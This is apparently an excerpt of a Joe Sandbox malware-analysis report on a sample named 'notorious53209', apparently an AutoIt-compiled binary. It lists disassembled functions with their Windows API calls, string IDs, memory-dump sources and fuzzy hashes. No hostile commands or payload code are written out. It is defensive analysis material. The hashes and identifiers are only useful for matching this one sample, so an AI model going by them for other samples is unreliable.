                                                  • Opcode Fuzzy Hash: 606fdc38c681bc19b398265b412fe13b7e3fa5d527d2ff9cff47067c528416d5
                                                  • Instruction Fuzzy Hash: 44F05E3A158B12EFDB212B68FC9C9EB7B2AFF45702B100531F202918B4DB755A51DB90
                                                  Function 008F8902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 008F8928
                                                  • CharUpperBuffW.USER32(?,?), ref: 008F8A37
                                                  • VariantClear.OLEAUT32(?), ref: 008F8BAF
                                                    • Part of subcall function 008E7804: VariantInit.OLEAUT32(00000000), ref: 008E7844
                                                    • Part of subcall function 008E7804: VariantCopy.OLEAUT32(00000000,?), ref: 008E784D
                                                    • Part of subcall function 008E7804: VariantClear.OLEAUT32(00000000), ref: 008E7859
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                  • API String ID: 4237274167-1221869570
                                                  • Opcode ID: d608d7f0f8c565b1c711fdacddd5d5e4e865b0aa45bc7aa56a503d786b850f78
                                                  • Instruction ID: dd277188b70625708b1628fcbf87b11b31500a3048ae9b3794a2c6699be8c30f
                                                  • Opcode Fuzzy Hash: d608d7f0f8c565b1c711fdacddd5d5e4e865b0aa45bc7aa56a503d786b850f78
                                                  • Instruction Fuzzy Hash: 62915771608305DFC714EF28C48596ABBE4FF89714F04496EF99ACB262DB30E906CB52
                                                  Function 008E2F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                  • _memset.LIBCMT ref: 008E3077
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E30A6
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 008E3159
                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 008E3187
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: c8bb505c59ebdd30186033ce6d6451d66d69251186e788eb62581d6f50dc6925
                                                  • Instruction ID: e7e971594ecd8c0b2f87eb54015f05ebc092ecfee90973de7545b8ad91a5eaaf
                                                  • Opcode Fuzzy Hash: c8bb505c59ebdd30186033ce6d6451d66d69251186e788eb62581d6f50dc6925
                                                  • Instruction Fuzzy Hash: 1851B071618380AED7259F29C849A6BB7E8FF97364F040A2DF895D3291DB70CE448753
                                                  Function 008DDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?), ref: 008DDAC5
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 008DDAFB
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject,?,?,?,?,?,?,?,?,?), ref: 008DDB0C
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008DDB8E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                                                  • Instruction ID: de9e762a70995c1ee1f30afc382ae26b390cf162c0dc517ed6ad7b0900a7ab1a
                                                  • Opcode Fuzzy Hash: fbf4231685f8d37c04ecf4cd80eeb0a33981f31216d9bdf21a37fc6f35a526f0
                                                  • Instruction Fuzzy Hash: B5414CB1600309EFDB15CF54C884A9A7BA9FF48364F1582ABAD05DF305D7B1DA44DBA0
                                                  Function 008E2C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 008E2CAF
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 008E2CCB
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 008E2D11
                                                  • DeleteMenu.USER32(?,00000000,00000000), ref: 008E2D5A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                                                  • Instruction ID: 2ac68c5aef11cf3814ac4e4f3ee0b7d94c8ea95fd0e23b4cdd03a56b8697b4c0
                                                  • Opcode Fuzzy Hash: e1f279325e3fab6c0e99ab04e54c6167e2e927b1aca332a313f4a9d717eba635
                                                  • Instruction Fuzzy Hash: 24418D702093859FD724DF29DC44B1ABBA8FF86320F14466DFA65D7291D770E904CB92
                                                  Function 008FDAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?), ref: 008FDAD9
                                                    • Part of subcall function 008879AB: _memmove.LIBCMT ref: 008879F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  • Opcode ID: fd5efcc6838a9ed3ef2a171fd2a9e0fa50584e363cd4fc00ac1b4c9a69297a56
                                                  • Instruction ID: eb16e577993ae86790cda170bb0273fafe040fd8b63bd95524dc82ff83c75186
                                                  • Opcode Fuzzy Hash: fd5efcc6838a9ed3ef2a171fd2a9e0fa50584e363cd4fc00ac1b4c9a69297a56
                                                  • Instruction Fuzzy Hash: 7531A17150421DAFCF14EF68CC819BEB7B5FF05320B108A29EA65D7691CB71E906CB81
                                                  Function 008D9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                    • Part of subcall function 008DB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 008DB0E7
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 008D93F6
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 008D9409
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 008D9439
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: 09c87945d1c3f6f4fa14e3739fb3028094ad8ca73d7451b458e73b1fc3e9f28e
                                                  • Instruction ID: a6adef4e44686b21fe98962b67870ecbaaeb5a71a8f6e80852ecb3ef42ae75d4
                                                  • Opcode Fuzzy Hash: 09c87945d1c3f6f4fa14e3739fb3028094ad8ca73d7451b458e73b1fc3e9f28e
                                                  • Instruction Fuzzy Hash: B1210471900108AEDB18AB78CC858FFB779FF45364F10421AF961E72E1DB355E0A9610
                                                  Function 00906656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00881D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00881D73
                                                    • Part of subcall function 00881D35: GetStockObject.GDI32(00000011), ref: 00881D87
                                                    • Part of subcall function 00881D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00881D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009066D0
                                                  • LoadLibraryW.KERNEL32(?), ref: 009066D7
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009066EC
                                                  • DestroyWindow.USER32(?), ref: 009066F4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                                                  • Instruction ID: 1d43bff58b5fc22a1444e75788d0def404a43abdce5221c0bf1c0663cd66c059
                                                  • Opcode Fuzzy Hash: 33d93bf9a4ee45eea18c8cab8ab6de587f299811c8b605efa7b7d8722cf3e660
                                                  • Instruction Fuzzy Hash: 29219D7120020AAFEF104F68EC80EBB37ADEB59768F104629F911921E0D772CC61A760
                                                  Function 008E703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 008E705E
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E7091
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 008E70A3
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 008E70DD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                                                  • Instruction ID: 0a19a64de08e5152bbc74bf931c841a5201c594ae6c2b8d807aa07d9e84374fb
                                                  • Opcode Fuzzy Hash: d9793d66499278c4125904bacfb6d351568e419b3b2d74a120efae6f13b2a0d4
                                                  • Instruction Fuzzy Hash: 31218E7450864AABDB209F3ADC05A9A77A8FF56724F204A19FCA0D72D0E7B099509B50
                                                  Function 008E710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 008E712B
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 008E715D
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 008E716E
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 008E71A8
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                                                  • Instruction ID: f591bdc3a56c1a99c8e1629faff4f4280848885110e2b28158b2e0719292eca7
                                                  • Opcode Fuzzy Hash: 9acc3c5f8c49e5f56fb63e811cfc64c597277fd1261acd863eab31b6d066db27
                                                  • Instruction Fuzzy Hash: CF21B375508389ABDB209F6A9C04A9AB7E8FF56734F200619FDB0D32D0E770D951CB51
                                                  Function 008EAEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 008EAEBF
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 008EAF13
                                                  • __swprintf.LIBCMT ref: 008EAF2C
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,0090F910), ref: 008EAF6A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: fc95bb8b40b6900f5a40435fe720f3b4aef58df229500c6d0cbd26f76920ec83
                                                  • Instruction ID: 796973e84abdc56c1af81819ab9705292bb51b3a92d7a68b86ca67bc7b5bfe1f
                                                  • Opcode Fuzzy Hash: fc95bb8b40b6900f5a40435fe720f3b4aef58df229500c6d0cbd26f76920ec83
                                                  • Instruction Fuzzy Hash: EF218330A00109AFCB10EF69CC85DAE7BB8FF89714B004069F949EB251DB71EE41DB62
                                                  Function 008DA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00887D2C: _memmove.LIBCMT ref: 00887D66
                                                    • Part of subcall function 008DA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008DA399
                                                    • Part of subcall function 008DA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 008DA3AC
                                                    • Part of subcall function 008DA37C: GetCurrentThreadId.KERNEL32(00000000), ref: 008DA3B3
                                                    • Part of subcall function 008DA37C: AttachThreadInput.USER32(00000000), ref: 008DA3BA
                                                  • GetFocus.USER32 ref: 008DA554
                                                    • Part of subcall function 008DA3C5: GetParent.USER32(?), ref: 008DA3D3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 008DA59D
                                                  • EnumChildWindows.USER32(?,008DA615), ref: 008DA5C5
                                                  • __swprintf.LIBCMT ref: 008DA5DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
                                                  • String ID: %s%d
                                                  • API String ID: 1941087503-1110647743
                                                  • Opcode ID: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                                                  • Instruction ID: 1ee15f607347eed9e3b8dc29c71c75972f5708316398cabb5558fee169996f03
                                                  • Opcode Fuzzy Hash: a93f97d5d077b049614a73600b055f9c9b30f0ae4fc3fe18ac706a512aefe056
                                                  • Instruction Fuzzy Hash: 5A11B471204208BBDF247F68EC85FEA377DFF48704F144176B908EA252CA749A459B76
                                                  Function 008E2017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 008E2048
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: 3f42cf59d7f7542295fcf4a4cb0bee8f33cac2eed760bd337ff919b51af0c5e5
                                                  • Instruction ID: 80bc65c9564fda9704923516c55a6e15b72709917726d4a47495b65a72ddaad9
                                                  • Opcode Fuzzy Hash: 3f42cf59d7f7542295fcf4a4cb0bee8f33cac2eed760bd337ff919b51af0c5e5
                                                  • Instruction Fuzzy Hash: F1115B759142098FCF10EFA8D9914EEB7F4FF5A304F108568D855E7292EB32A906CF51
                                                  Function 008FEE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 008FEF1B
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 008FEF4B
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 008FF07E
                                                  • CloseHandle.KERNEL32(?), ref: 008FF0FF
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
